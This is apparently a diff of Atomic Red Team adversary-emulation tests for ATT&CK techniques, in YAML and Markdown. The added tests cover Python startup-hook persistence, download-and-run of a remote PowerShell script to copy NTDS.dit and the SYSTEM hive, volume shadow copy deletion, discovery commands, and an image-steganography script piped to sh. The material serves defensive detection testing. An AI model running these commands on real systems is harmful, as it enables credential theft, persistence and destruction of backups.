+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
  T1037.003:
    technique:
      type: attack-pattern
@@ -49918,20 +50023,6 @@ persistence:

          3. Click 'Select'
        name: manual
-    - name: Chrome/Chromium (Chrome Web Store)
-      auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
-      description: Install the "Minimum Viable Malicious Extension" Chrome extension
-      supported_platforms:
-      - linux
-      - windows
-      - macos
-      executor:
-        steps: |
-          1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
-          in Chrome
-
-          2. Click 'Add to Chrome'
-        name: manual
    - name: Firefox
      auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
      description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -58924,7 +59015,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -58960,7 +59051,99 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test.
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
+          $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
  T1037.003:
    technique:
      type: attack-pattern
@@ -66924,7 +67107,6 @@ collection:
      auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
      description: |
        Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
-
        [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
      supported_platforms:
      - windows
@@ -66966,6 +67148,45 @@ collection:
          '
        name: powershell
        elevation_required: true
+    - name: RDP Bitmap Cache Extraction via bmc-tools
+      auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
+      description: |
+        Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
+        This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
+      supported_platforms:
+      - windows
+      input_arguments:
+        cache_path:
+          description: Path to the RDP Cache directory or specific .bmc file
+          type: path
+          default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
+        output_dir:
+          description: Directory to save reconstructed images
+          type: path
+          default: "$env:TEMP\\rdp_screens"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and in the PATH to run bmc-tools.py
+
+          '
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "Please install Python manually."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
+          = \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
+          Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
+          curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
+          $toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
+        cleanup_command: |
+          Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
+          Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
  T1557:
    technique:
      type: attack-pattern
@@ -80093,6 +80314,62 @@ credential-access:
          diskshadow.exe /s #{filename}
        name: command_prompt
        elevation_required: true
+    - name: Copy NTDS in low level NTFS acquisition via MFT parsing
+      auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+    - name: Copy NTDS in low level NTFS acquisition via fsutil
+      auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
  T1558.003:
    technique:
      type: attack-pattern
@@ -80529,8 +80806,7 @@ credential-access:
          '
        prereq_command: |
          $RequiredModule = Get-Module -Name DSInternals -ListAvailable
-          if (-not $RequiredModule) {exit 1}
-          if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
+          if (-not $RequiredModule) {exit 1} else {exit 0}
        get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force

          '
@@ -82761,7 +83037,7 @@ discovery:
      - windows
      executor:
        command: |
-          tasklist.exe
+          tasklist.exe /svc
          sc query
          sc query state= all
        name: command_prompt
@@ -82796,6 +83072,37 @@ discovery:
      executor:
        name: command_prompt
        command: powershell.exe Get-Service
+    - name: System Service Discovery - Windows Scheduled Tasks (schtasks)
+      auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
+      description: 'Enumerates scheduled tasks on Windows using schtasks.exe.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        command: schtasks /query /fo LIST /v
+    - name: System Service Discovery - Services Registry Enumeration
+      auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
+      description: |
+        Enumerates Windows services by reading the Services registry key
+        (HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
+        Manager APIs or CLI tools such as sc.exe or Get-Service.
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: |
+          Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
+            ForEach-Object {
+              $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
+              [PSCustomObject]@{
+                Name        = $_.PSChildName
+                DisplayName = $p.DisplayName
+                ImagePath   = $p.ImagePath
+                StartType   = $p.Start
+              }
+            }
  T1040:
    technique:
      type: attack-pattern
@@ -85394,20 +85701,20 @@ discovery:
      description: |
        Get a listing of network connections.

-        Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
+        Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
+        elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
      supported_platforms:
      - windows
      executor:
        command: |
-          netstat
+          netstat -ano
          net use
-          net sessions
+          net sessions 2>nul
        name: command_prompt
    - name: System Network Connections Discovery with PowerShell
      auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
      description: |
        Get a listing of network connections.
-
        Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
      supported_platforms:
      - windows
@@ -85416,6 +85723,27 @@ discovery:

          '
        name: powershell
+    - name: System Network Connections Discovery via PowerShell (Process Mapping)
+      auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
+      description: 'Enumerate TCP connections and map to owning process names via
+        PowerShell.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: |
+          Get-NetTCPConnection | ForEach-Object {
+            $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
+            [pscustomobject]@{
+              Local   = "$($_.LocalAddress):$($_.LocalPort)"
+              Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
+              State   = $_.State
+              PID     = $_.OwningProcess
+              Process = if ($p) { $p.ProcessName } else { $null }
+            }
+          } | Sort-Object State,Process | Format-Table -AutoSize
    - name: System Discovery using SharpView
      auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
      description: "Get a listing of network connections, domains, domain users, and
@@ -95551,7 +95879,29 @@ impact:
      x_mitre_impact_type:
      - Availability
      identifier: T1496
-    atomic_tests: []
+    atomic_tests:
+    - name: Windows - Simulate CPU Load with PowerShell
+      auto_generated_guid: 44315fb0-f78d-4cef-b10f-cf21c1fe2c75
+      description: |
+        This test simulates high CPU load using PowerShell, commonly seen in resource hijacking.
+        Spawns background jobs to stress CPU cores for a specified duration.
+      supported_platforms:
+      - windows
+      input_arguments:
+        duration_seconds:
+          description: Duration in seconds to run the CPU stress test
+          type: integer
+          default: 30
+        cpu_threads:
+          description: Number of threads to stress (default 4)
+          type: integer
+          default: 4
+      executor:
+        command: |
+          $end = (Get-Date).AddSeconds(#{duration_seconds})
+          1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
+          Get-Job | Wait-Job | Remove-Job
+        name: powershell
  T1565.002:
    technique:
      type: attack-pattern
@@ -96206,6 +96556,35 @@ impact:
        cleanup_command: 'sc sdset VSS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

          '
+    - name: Windows - Delete Volume Shadow Copies via Diskshadow
+      auto_generated_guid: 42111a6f-7e7f-482c-9b1b-3cfd090b999c
+      description: 'Deletes Windows Volume Shadow Copies via Diskshadow binary. This
+        technique is used by numerous ransomware families such as Crytox. The binary
+        is present by default in Windows Server operating systems (since Windows Server
+        2008). Upon execution, it will delete all shadow copies of the server.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Create volume shadow copy of C:\ . This prereq command only
+          works on Windows Server or Windows 8.
+
+          '
+        prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
+          that satisfy the query.")) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'vssadmin.exe create shadow /for=c:
+
+          '
+      executor:
+        command: '"delete shadows all" | diskshadow.exe
+
+          '
+        name: powershell
+        elevation_required: true
  T1561.001:
    technique:
      type: attack-pattern
@@ -1,23 +1,19 @@
 # T1001.002 - Data Obfuscation via Steganography
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
-<blockquote>

-Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. 
+## Description from ATT&CK

-</blockquote>
+> Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
+
+[Source](https://attack.mitre.org/techniques/T1001/002)

 ## Atomic Tests

- [Atomic Test #1 - Steganographic Tarball Embedding](#atomic-test-1---steganographic-tarball-embedding)
+- [Atomic Test #1: Steganographic Tarball Embedding](#atomic-test-1-steganographic-tarball-embedding)
+- [Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2-embedded-script-in-image-execution-via-extract-invoke-psimage)
+- [Atomic Test #3: Execute Embedded Script in Image via Steganography](#atomic-test-3-execute-embedded-script-in-image-via-steganography)

- [Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2---embedded-script-in-image-execution-via-extract-invoke-psimage)
+### Atomic Test #1: Steganographic Tarball Embedding

- [Atomic Test #3 - Execute Embedded Script in Image via Steganography](#atomic-test-3---execute-embedded-script-in-image-via-steganography)
-
-
-<br/>
-
-## Atomic Test #1 - Steganographic Tarball Embedding
 This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) 
 within an image.

@@ -31,14 +27,10 @@ By embedding the tarball file within the image, adversaries can obscure their ac

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c7921449-8b62-4c4d-8a83-d9281ac0190b`

-**auto_generated_guid:** c7921449-8b62-4c4d-8a83-d9281ac0190b
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | image_file | Image file which will be downloaded to be used to hide data | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;T1001.002.jpg|
@@ -46,70 +38,77 @@ By embedding the tarball file within the image, adversaries can obscure their ac
 | new_image_file | new image file ready for extraction | path | $env:PUBLIC&#92;Downloads&#92;T1001.002New.jpg|
 | passwords_file | Text file containing random passwords | path | $env:TEMP&#92;random_passwords.txt|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
 Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Image file must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (!(Test-Path "#{image_file}")) {exit 1} else {
 {exit 0}
 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
 Write-Output "Downloading image file..."
 $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
 Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
 ```
+
 ##### Description: File to hide within tarz file must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (!(Test-Path "#{passwords_file}")) {exit 1} else {
 {exit 0}
 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Output "Generating random passwords and saving to file..."
 $passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
 $passwords | Out-File -FilePath "#{passwords_file}"
 ```
+
 ##### Description: Tarz file to embed in image must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (!(Test-Path "#{tar_file}")) {exit 1} else {
 {exit 0}
 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Output "Generating tarz file..."
 tar -cvf "#{tar_file}" "#{passwords_file}"
 ```

+### Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage
 This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. 
 The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden 
 within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
@@ -123,22 +122,16 @@ is done to emulate an attackers behaviour in the case they were to execute malwa

 **Supported Platforms:** Windows

+**auto_generated_guid:** `04bb8e3d-1670-46ab-a3f1-5cee64da29b6`

-**auto_generated_guid:** 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | image_file | Malicious Image file which will be downloaded | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;evil_kitten.jpg|
 | psimage_script | Extract-Invoke-PSImage Script downloaded | path | PathToAtomicsFolder&#92;ExternalPayloads&#92;Extract-Invoke-PSImage.ps1|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 cd "PathToAtomicsFolder\ExternalPayloads\"
@@ -157,7 +150,8 @@ $textMatches -join '' | Set-Content -Path $scriptPath
 . "$HOME\textExtraction.ps1"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
 Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
@@ -165,31 +159,39 @@ Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
 Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Image file must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (!(Test-Path "#{image_file}")) {exit 1} else {
 {exit 0}
 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
 Write-Output "Downloading image file..."
 $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
 Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
 ```
+
 ##### Description: Extract-Invoke-PSImage must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (!(Test-Path "#{psimage_script}")) {exit 1} else {
 {exit 0}
 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
 Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
@@ -197,46 +199,30 @@ $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165
 Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
 ```

+### Atomic Test #3: Execute Embedded Script in Image via Steganography

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Execute Embedded Script in Image via Steganography
 This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `4ff61684-ad91-405c-9fbc-048354ff1d07`

-**auto_generated_guid:** 4ff61684-ad91-405c-9fbc-048354ff1d07
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script | Shell Script file to be embedded and executed | String | PathToAtomicsFolder/script.sh|
 | evil_image | The modified image with embedded script | String | PathToAtomicsFolder/evil_image.jpg|
 | image | Image file to be embedded | String | PathToAtomicsFolder/image.jpg|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"; strings "#{evil_image}" | tail -n 1 | base64 -d | sh
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm "#{evil_image}"
 ```
-
-
-
-
-
-<br/>
@@ -1,72 +1,56 @@
 # T1003.001 - OS Credential Dumping: LSASS Memory
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
-<blockquote>

-Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
+## Description from ATT&CK

-As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
